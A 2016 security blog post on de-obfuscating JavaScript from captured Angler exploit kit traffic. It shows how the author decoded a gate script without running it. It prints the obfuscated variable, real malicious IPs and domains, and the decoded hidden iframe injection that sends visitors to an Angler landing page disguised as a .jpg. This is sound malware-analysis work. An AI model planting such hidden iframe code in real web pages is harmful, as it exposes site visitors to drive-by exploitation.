Friday, June 3, 2016

De-Obfuscating Angler Again

I saw today's blog post by @malware_traffic, 2016-06-02 - EK DATA DUMP (ANGLER EK, KAIXIN EK, RIG EK). In Brad's notes he listed two URLs that I thought I'd look into a bit more today:

212.231.130.9 port 80 - positivessl.online - GET /script/jquery.min.js - possible gate to Angler EK (I think)
162.252.83.62 port 80 - strachubedabbling.thompsons-online.co.uk - Angler EK


He posted the PCAP for this traffic, so I opened it in Wireshark, used Export HTTP Object on the positivessl.online traffic and saved the raw obfuscated JavaScript. Reading through it I realized that the variable Mjk2MjkxMDI1MQ was used but never defined in that file, so I looked back in the PCAP at the preceding HTTP response (the page that loaded the script) and found this block of code:

<script>var Mjk2MjkxMDI1MQ="\x4d\x54M\x31O\x54E\x34O\x44A\x35\x4dw";</script>
<script src="http://positivessl.online/script/jquery.min.js"></script>


So I defined that variable myself at the top of the saved script:

var Mjk2MjkxMDI1MQ="\x4d\x54M\x31O\x54E\x34O\x44A\x35\x4dw";


I wrapped it in HTML, BODY, and SCRIPT tags, and replaced the malicious function calls at the bottom with plain console.log statements, so the decoded strings get printed instead of executed:

console.log(MTEzMzMzNTAxOQ);
console.log(Mjk2MjkxMDI1MQ);
console.log(vrDCFrjI(MTEzMzMzNTAxOQ, Mjk2MjkxMDI1MQ));


When I loaded this page in a browser, the de-obfuscated first layer of JavaScript was revealed.

Then I performed very similar steps on that layer: I removed every function call (anything with open and close parentheses) and replaced it with a console.log statement, to dump what the attacker was going to do without actually executing it. The result was the following simple iframe-creating code (each line is the output of one of those console.log calls, which is why the createElement call is repeated on every line):

window['document']['createElement']('iframe')
window['document']['createElement']('iframe')['width'] = 13;
window['document']['createElement']('iframe')['height'] = 13;
window['document']['createElement']('iframe')['style']['cssText'] = 'position:absolute;left:-1658px;top:-1668px';
window['document']['createElement']('iframe')['src'] = 'http://strachubedabbling.thompsons-online.co.uk/YxuZYR/rTkNnLU/fOhXXjpeY/00757/sdmmTqbwdx-092620-zkbgrwhi.jpg';


So now we know what the attacker was doing without actually running it: create a new iframe, set its width and height to something tiny (13 by 13 pixels), position it far off-screen so nobody sees it, and point its src at the Angler EK host from Brad's notes. The URL ends in .jpg, but that is just disguise; the response at that address is the Angler EK landing page, not an image.


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
